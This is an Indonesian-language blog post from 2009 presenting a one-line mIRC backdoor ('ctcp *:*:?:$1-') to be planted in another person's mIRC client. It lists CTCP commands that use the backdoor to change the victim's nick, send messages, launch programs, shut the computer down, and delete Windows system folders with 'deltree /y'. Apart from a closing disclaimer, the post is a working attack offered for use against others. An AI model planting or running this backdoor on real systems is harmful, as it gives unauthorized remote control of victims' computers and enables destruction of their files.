Sabtu, 22 Agustus 2009

Hacking Client IRC Dengan Perintah Remote

kode ini, mungkin sebutannya backdoor lebih tepatnya karena dapat memberikan akses penuh ke komputer yg terinfeksi melalui remote didalam mirc. kode ini saya pertama kali lihat di remote mirc saya ketika saya sedang di kerjain teman saya sendiri,lalu saya mencoba bertanya kepada dia bagaimana cara kerjanya? lalu dia menjelaskan kepada saya cara kerjanya. Kode mirc-nya sebagai berikut : ctcp *:*:?:$1- di taruh di remote lawan anda,..
mungkin anda semua bisa mencobanya sendiri dengan membuka 2 mirc di komputer anda yg sudah terkoneksi, lalu anda taruh kode ini di salah satu mirc yang mau di ujikan. cara kerja kode ini melalui client to client protokol. kode tersebut memberikan akses penuh kepada siapa saja yang meng query mirc yang terinfeksi dgn perintah-perintah standard yang di gunakan dalam mirc. perintahnya:
misalkan nick yg terinfeksi = dedi-plg
1. untuk merubah nicknya cukup menggunakan perintah /ctcp dedi-plg nick gua_bego , nick lansung berubah ke gua_bego
2. untuk membuat mirc terinfeksi mengirimkan msg /ctcp gua_bego msg nick-yg-mau-di-msg/#channel tesssstessssssstesssssss123 tapi jangan pake kata kotor ,, kasihan juga ntar kena banned hehehhhe
3. untuk membuat dia menjalankan program. /ctcp gua_bego run iexplore.exe www.jasakom.com
4. untuk meng-shutdown komputer lawan. /ctcp gua_bego run rundll32.exe user,exitwindows
Mungkin ini agak seram kalo di buat perintah untuk menghancurkan komputer lawan,.. kalo anda terpikir utk mem-format komputer lawan,, kayaknya bakalan susah karena kalo anda menjalankan format c:, kemungkinan tidak bisa karena hard-disk terpakai oleh mirc terinfeksi . tapi kalo di pikir-pikir masih bisa juga mendelete files komputer terinfeksi kode ini yaitu dengan cara menggunakan perintah:/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows\system
/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows
--kayaknya bakal berabe deh.
# Tolong jangan di pakai buat merusak komputer yang terinfeksi, mungkin anda bisa menggunakan perintah-perintah yang tidak merusak just for phun

Tidak ada komentar:

Posting Komentar